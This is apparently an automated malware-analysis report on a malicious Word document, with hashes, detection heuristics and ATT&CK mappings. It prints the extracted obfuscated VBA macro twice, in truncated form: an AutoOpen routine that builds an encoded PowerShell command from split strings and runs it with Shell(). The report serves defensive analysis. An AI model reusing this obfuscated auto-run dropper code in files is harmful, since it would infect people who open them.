Office (OLE) malware analysis — malicious · fd7fecdc3d19ffdf

MALICIOUS

Office (OLE)

102.2 KB Created: 2018-06-05 12:05:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 802a2af119a403979a3443abba3dd47e SHA-1: 9085c2722506f4235c852e3fb9b88664ffb3ca14 SHA-256: fd7fecdc3d19ffdfe7acf86b42e4be623302e86c812d2eed4dd3ed214becfe6f

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers a function that uses Shell() to execute a command. This command appears to be constructed from concatenated strings, likely forming a command to download and execute a second-stage payload. The specific command constructed is 'md GqGMMjv EKXmaYwhWwrOpmdirGUNBAho' and 'QcT IluAvEj & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c '.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12297 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12297 bytes
SHA-256: `b3735de9b599c03c41b4b0cd5c350661ac95721a1e891384f6cb98d0978da8aa`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HRYawRwHzM" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function jmznhcvAS() On Error Resume Next zskKII = Hex(BvAoF + Hex(QivOGU) * 98183 + Round(cVCuW)) McYYd = Cos(foXWVG) tSCdbw = CDate(dSndR) PXXXiQ = Cos(BLYXbK) CcKZs = Hex(pFlZra + Hex(UdupuH) * 58338 + Round(HQAnF)) chufB = Cos(azAHN) RJKmwf = CDate(RRYRj) UjDvLK = Cos(mfMXru) jmznhcvAS = sITacKZ + Shell(ArXizituRT + Chr(IFpdIcYoT + vbKeyC + mpLlCQLwii) + LrjhrUb + hAmPT + MbzXTjPunS + APSlDwi + KqSTw + LimwhMPbj, 27669 - 27669) KYUcnb = Hex(pVIVS + Hex(fnCEQ) * 20821 + Round(hjWEo)) bwmwnu = Cos(qztzv) HTfLuZ = CDate(qGwcIG) rHaBPn = Cos(zKDZVa) End Function Sub Autoopen() On Error Resume Next dhtFI = Hex(CjCYcf + Hex(GVzKnj) * 27255 + Round(iWshH)) IIcmYw = Cos(MYFWzV) IFCZks = CDate(iLslpM) uKBYA = Cos(uaamDj) jmznhcvAS uwuoo = Hex(kDdUT + Hex(OEizjB) * 67037 + Round(iRODzw)) iifPV = Cos(dphQE) iczRpi = CDate(msQcql) ukciq = Cos(pmBVzF) End Sub Attribute VB_Name = "skOwhfEEKjzYVV" Function LrjhrUb() On Error Resume Next dEJwvr = Hex(wjYzYO + Hex(wTaIaD) * 56906 + Round(CsVEdS)) jQRch = Cos(zjXJG) jQoTp = CDate(WXoiEQ) wuCRd = Cos(OiiwIf) jnjNRE = "md Gq" + "GMMjv EKXma" + "YwhW" + "wrOpmdirGUNBAho" jKzjCz = Hex(wuSNY + Hex(aHudFM) * 2695 + Round(iWzSu)) sdETf = Cos(twLYEb) zOEco = CDate(zQGjBr) idznBR = Cos(haTpz) TTOGmUzi = "QcT IluAvEj " + "& " + "%^c^" + "o^m^S^p^E^c^% " + " %^c^o" + "^m^S^p^E^c^% " + " " + "/V " + "/c " kmivWY = Hex(GEEiuI + Hex(zBltDb) * 68528 + Round(QwYWn)) XWuPd = Cos(HKmLM) OpaZTt = CDate(qKfoZm) waVfX = Cos(lJjhJ) zpWpozGCi = " set" + " %FUvE" + "wAwEPzPLEdi%=Z" + "aaCJqzKw" + "d&&s" + "et " + "%TXJMuwH" QBSmO = Hex(jaMukr + Hex(idwKri) * 40545 + Round(FIhoHn)) rFGsP = Cos(drYXR) sMLEq = CDate(AtWowr) omLtkz = Cos(mUiHn) RinCFXWwPu = "zzASw%=p&" + "&set %brp" + "jFicY%=" + "o^w&&set " + "%jNM" + "wOuqC" + "XOvCXNF%=RpAROX" + "iQUZVCZP&&" bZBlYm = Hex(TcQuEq + Hex(GupDG) * 29118 + Round(bSRwnZ)) bYiEQ = Cos(DarlQM) fMVRp = CDate(nBrifA) zAGjn = Cos(MRsDmp) ddvXVtUXnO = "se" + "t " + "%j" + "VVXrDUiHpvSkz%" + "=!" + "%TXJMuwH" rGfDEm = Hex(wOPzAI + Hex(mIkuzD) * 83722 + Round(DUIwj)) wnIjbB = Cos(jVoas) ajlJi = CDate(qaJHJn) wqDLuF = Cos(uzbHN) ZUwlursfzb = "zzASw%!&&set" + " %WlI" + "TTirTlVUBFQY%=D" + "NzNYIJiO" + "J&&set %lWPK" + "Qmlh" + "WR%=e^r&&set %J" + "wZXfK" + "WOAa%=!%brpjFic" + "Y%!&&set %laz" HrFmw = Hex(GzRSR + Hex(ZTpZp) * 60694 + Round(wpFMdK)) UlMaIi = Cos(JXzVWL) joiYlA = CDate(mRVKv) RjCfc = Cos(CzUlrK) KDhUCVWwLUL = "JLkG" + "lUDDP%=s&&s" + "et %jwb" + "oZodIrKuEtWE%" + "=EfwMROr" + "wWHEMqO&&set %" + "Pz" + "CmKMTKNv%=h" + "e&&set %nzj" + "jUMS" OQwpES = Hex(IPAan + Hex(JYiUrQ) * 23753 + Round(iZUUt)) IpLDnN = Cos(lEpcQr) zBjcrk = CDate(iRAua) SjqbUL = Cos(LTEzm) GQdPtlOwCw = "iBNaB%=ll&&!%jV" + "VXrDUiHpvSk" + "z%!!%" + "JwZXfKWOAa" + "%!!%lWPKQmlh" + "WR%!!%la" + "zJLkGlU" + "DDP%!!%Pz" tXTsra = Hex(kVdqs + Hex(IbiXLI) * 24836 + Round(fBONH)) TQjwl = Cos(RqvLZI) CNwGA = CDate(rCzhvt) ZJNVFf = Cos(UFUojE) HMjBwFbi = "CmKMTKNv%!!%nz" + "jjUMSiBN" + "aB%! -e IAAu" + "ACgAI" + "AAkAGUAbgBW" + "ADoAYwBPAE0Ac" + "wBwAGUAYwBbADQA" + "LAA" MRfSw = Hex(oKCjv + Hex(iQCWj) * 71886 + Round(wQHca)) uYzws = Cos(Zvjfl) OwqzO = CDate(iZrAT) jlDdI = Cos(EoFMEd) MZuvOzm = "yADYALAAyADUAXQ" + "AtAEoATwBpAG4AJ" + "wAnACkAK" + "ABuAEUAVwAtAG8" + "AQgBKAEUA" + "QwBUAC" LrjhrUb = jnjNRE + TTOGmUzi + zpWpozGCi + RinCFXWwPu + ddvXVtUXnO + ZUwlursfzb + KDhUCVWwLUL + GQdPtlOwCw + HMjBwFbi + MZuvOzm End Function Function hAmPT() On Error Resume Next OKbWRw = Hex(REUoMw + Hex(AwAOt) * 8576 + Round(NHEwnt)) wMCsMK = Cos(wDDaC) zfQPQL = CDate(EqEzLZ) ACWZd = Cos(LVrSv) MAjqCsPjf = "AAIABzAFkA" + "UwBUAGUAbQ" + "AuAEkA" + "bwAuAEMA" mADuwo = Hex(Viirpf + Hex(HVGIEh) * 75953 + Round(zujdw)) XinzTQ = Co ... (truncated)

SHA-256: b3735de9b599c03c41b4b0cd5c350661ac95721a1e891384f6cb98d0978da8aa

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HRYawRwHzM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jmznhcvAS()
On Error Resume Next
zskKII = Hex(BvAoF + Hex(QivOGU) * 98183 + Round(cVCuW))
McYYd = Cos(foXWVG)
tSCdbw = CDate(dSndR)
PXXXiQ = Cos(BLYXbK)
CcKZs = Hex(pFlZra + Hex(UdupuH) * 58338 + Round(HQAnF))
chufB = Cos(azAHN)
RJKmwf = CDate(RRYRj)
UjDvLK = Cos(mfMXru)
jmznhcvAS = sITacKZ + Shell(ArXizituRT + Chr(IFpdIcYoT + vbKeyC + mpLlCQLwii) + LrjhrUb + hAmPT + MbzXTjPunS + APSlDwi + KqSTw + LimwhMPbj, 27669 - 27669)
KYUcnb = Hex(pVIVS + Hex(fnCEQ) * 20821 + Round(hjWEo))
bwmwnu = Cos(qztzv)
HTfLuZ = CDate(qGwcIG)
rHaBPn = Cos(zKDZVa)
End Function
Sub Autoopen()
On Error Resume Next
dhtFI = Hex(CjCYcf + Hex(GVzKnj) * 27255 + Round(iWshH))
IIcmYw = Cos(MYFWzV)
IFCZks = CDate(iLslpM)
uKBYA = Cos(uaamDj)
jmznhcvAS
uwuoo = Hex(kDdUT + Hex(OEizjB) * 67037 + Round(iRODzw))
iifPV = Cos(dphQE)
iczRpi = CDate(msQcql)
ukciq = Cos(pmBVzF)
End Sub


Attribute VB_Name = "skOwhfEEKjzYVV"
Function LrjhrUb()
On Error Resume Next
dEJwvr = Hex(wjYzYO + Hex(wTaIaD) * 56906 + Round(CsVEdS))
jQRch = Cos(zjXJG)
jQoTp = CDate(WXoiEQ)
wuCRd = Cos(OiiwIf)
jnjNRE = "md Gq" + "GMMjv EKXma" + "YwhW" + "wrOpmdirGUNBAho"
jKzjCz = Hex(wuSNY + Hex(aHudFM) * 2695 + Round(iWzSu))
sdETf = Cos(twLYEb)
zOEco = CDate(zQGjBr)
idznBR = Cos(haTpz)
TTOGmUzi = "QcT IluAvEj " + "&     " + "%^c^" + "o^m^S^p^E^c^%  " + "   %^c^o" + "^m^S^p^E^c^% " + "    " + "/V         " + "/c   "
kmivWY = Hex(GEEiuI + Hex(zBltDb) * 68528 + Round(QwYWn))
XWuPd = Cos(HKmLM)
OpaZTt = CDate(qKfoZm)
waVfX = Cos(lJjhJ)
zpWpozGCi = "        set" + " %FUvE" + "wAwEPzPLEdi%=Z" + "aaCJqzKw" + "d&&s" + "et " + "%TXJMuwH"
QBSmO = Hex(jaMukr + Hex(idwKri) * 40545 + Round(FIhoHn))
rFGsP = Cos(drYXR)
sMLEq = CDate(AtWowr)
omLtkz = Cos(mUiHn)
RinCFXWwPu = "zzASw%=p&" + "&set %brp" + "jFicY%=" + "o^w&&set " + "%jNM" + "wOuqC" + "XOvCXNF%=RpAROX" + "iQUZVCZP&&"
bZBlYm = Hex(TcQuEq + Hex(GupDG) * 29118 + Round(bSRwnZ))
bYiEQ = Cos(DarlQM)
fMVRp = CDate(nBrifA)
zAGjn = Cos(MRsDmp)
ddvXVtUXnO = "se" + "t " + "%j" + "VVXrDUiHpvSkz%" + "=!" + "%TXJMuwH"
rGfDEm = Hex(wOPzAI + Hex(mIkuzD) * 83722 + Round(DUIwj))
wnIjbB = Cos(jVoas)
ajlJi = CDate(qaJHJn)
wqDLuF = Cos(uzbHN)
ZUwlursfzb = "zzASw%!&&set" + " %WlI" + "TTirTlVUBFQY%=D" + "NzNYIJiO" + "J&&set %lWPK" + "Qmlh" + "WR%=e^r&&set %J" + "wZXfK" + "WOAa%=!%brpjFic" + "Y%!&&set %laz"
HrFmw = Hex(GzRSR + Hex(ZTpZp) * 60694 + Round(wpFMdK))
UlMaIi = Cos(JXzVWL)
joiYlA = CDate(mRVKv)
RjCfc = Cos(CzUlrK)
KDhUCVWwLUL = "JLkG" + "lUDDP%=s&&s" + "et %jwb" + "oZodIrKuEtWE%" + "=EfwMROr" + "wWHEMqO&&set %" + "Pz" + "CmKMTKNv%=h" + "e&&set %nzj" + "jUMS"
OQwpES = Hex(IPAan + Hex(JYiUrQ) * 23753 + Round(iZUUt))
IpLDnN = Cos(lEpcQr)
zBjcrk = CDate(iRAua)
SjqbUL = Cos(LTEzm)
GQdPtlOwCw = "iBNaB%=ll&&!%jV" + "VXrDUiHpvSk" + "z%!!%" + "JwZXfKWOAa" + "%!!%lWPKQmlh" + "WR%!!%la" + "zJLkGlU" + "DDP%!!%Pz"
tXTsra = Hex(kVdqs + Hex(IbiXLI) * 24836 + Round(fBONH))
TQjwl = Cos(RqvLZI)
CNwGA = CDate(rCzhvt)
ZJNVFf = Cos(UFUojE)
HMjBwFbi = "CmKMTKNv%!!%nz" + "jjUMSiBN" + "aB%!  -e IAAu" + "ACgAI" + "AAkAGUAbgBW" + "ADoAYwBPAE0Ac" + "wBwAGUAYwBbADQA" + "LAA"
MRfSw = Hex(oKCjv + Hex(iQCWj) * 71886 + Round(wQHca))
uYzws = Cos(Zvjfl)
OwqzO = CDate(iZrAT)
jlDdI = Cos(EoFMEd)
MZuvOzm = "yADYALAAyADUAXQ" + "AtAEoATwBpAG4AJ" + "wAnACkAK" + "ABuAEUAVwAtAG8" + "AQgBKAEUA" + "QwBUAC"
LrjhrUb = jnjNRE + TTOGmUzi + zpWpozGCi + RinCFXWwPu + ddvXVtUXnO + ZUwlursfzb + KDhUCVWwLUL + GQdPtlOwCw + HMjBwFbi + MZuvOzm
End Function
Function hAmPT()
On Error Resume Next
OKbWRw = Hex(REUoMw + Hex(AwAOt) * 8576 + Round(NHEwnt))
wMCsMK = Cos(wDDaC)
zfQPQL = CDate(EqEzLZ)
ACWZd = Cos(LVrSv)
MAjqCsPjf = "AAIABzAFkA" + "UwBUAGUAbQ" + "AuAEkA" + "bwAuAEMA"
mADuwo = Hex(Viirpf + Hex(HVGIEh) * 75953 + Round(zujdw))
XinzTQ = Co
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.